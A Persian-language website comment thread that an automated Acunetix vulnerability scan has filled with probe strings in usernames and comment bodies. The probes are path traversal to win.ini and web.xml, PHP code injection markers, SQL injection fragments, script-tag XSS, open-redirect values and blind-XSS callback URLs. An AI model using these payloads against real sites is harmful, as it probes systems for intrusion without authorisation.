dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۶نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۷نوشت:

../../../../../../../../../../windows/win.ini

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۷نوشت:

${@print(md5(acunetix_wvs_security_test))}

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۷نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۷نوشت:

../../../../../../../../../../boot.ini

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۷نوشت:

${@print(md5(acunetix_wvs_security_test))}\\

jpfsdmis در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۷نوشت:

1

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

../../../../../../../../../../windows/win.ini\0.jpg

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

1

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

1

jpfsdmis در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

http://hitL8G3ZjVbjM.bxss.me/

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۸نوشت:

1

jpfsdmis در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۹نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۹نوشت:

1

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۹نوشت:

index.php

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۹نوشت:

................windowswin.ini

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۹نوشت:

1

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۹نوشت:

index.php

http://hitNzOV1PY5jG.bxss.me/ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۰نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۰نوشت:

..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۰نوشت:

1

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۰نوشت:

index.php/.

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۱نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۱نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۱نوشت:

/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۱نوشت:

1

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۱نوشت:

1

;print(md5(acunetix_wvs_security_test)); در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۱نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۱نوشت:

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

1

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

1

';print(md5(acunetix_wvs_security_test));$a=' در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

1

";print(md5(acunetix_wvs_security_test));$a=" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۲نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۳نوشت:

unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\

dogrikgg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۳نوشت:

1

${@print(md5(acunetix_wvs_security_test))} در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۳نوشت:

1

sample%40email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۳نوشت:

1

${@print(md5(acunetix_wvs_security_test))}\\ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۳نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۴نوشت:

WEB-INF/web.xml?

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۴نوشت:

1

index.php در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۴نوشت:

1

sucandov در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۴نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۴نوشت:

WEB-INF\\web.xml?

index.php در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

1

sucandov در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

1

index.php/. در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

1

sucandov در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۶نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۶نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۶نوشت:

1

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۶نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۶نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۶نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۶نوشت:

1'"

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۷نوشت:

1

bdaamjlh در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۷نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۷نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۷نوشت:

\\

bdaamjlh در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۷نوشت:

'"

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۷نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۸نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۸نوشت:

bdaamjlh در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۸نوشت:

<!--

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۸نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۸نوشت:

@@nU2xl

bdaamjlh در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۸نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۸نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۹نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۹نوشت:

JyI=

bdaamjlh در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۹نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۹نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۹نوشت:

www.vulnweb.com

'" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۲۹نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۰نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۰نوشت:

<!-- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۰نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۰نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۰نوشت:

http://www.vulnweb.com

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۱نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۱نوشت:

bvppbmck در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۱نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۱نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۱نوشت:

(select convert(int,CHAR(65)))

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۲نوشت:

//www.vulnweb.com

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1'"()&%<acx><ScRiPt >prompt(962123)</ScRiPt>

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۲نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۲نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۳نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۳نوشت:

'"()&%<acx><ScRiPt >prompt(906995)</ScRiPt>

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۳نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۳نوشت:

/\\www.vulnweb.com

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۳نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۳نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1_928401

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۴نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۴نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۴نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۴نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۴نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۴نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۴نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۵نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۵نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۵نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۶نوشت:

acu5656<s1﹥s2ʺs3ʹuca5656

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۶نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۶نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۶نوشت:

1

kbgtquxn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۶نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۶نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۶نوشت:

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۷نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۷نوشت:

1

www.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۷نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۷نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۷نوشت:

acu168%6xuca168AAAAA

http://www.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۸نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۸نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۸نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۸نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۹نوشت:

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۹نوشت:

1

//www.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۹نوشت:

1

cxcfxurf در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۹نوشت:

1

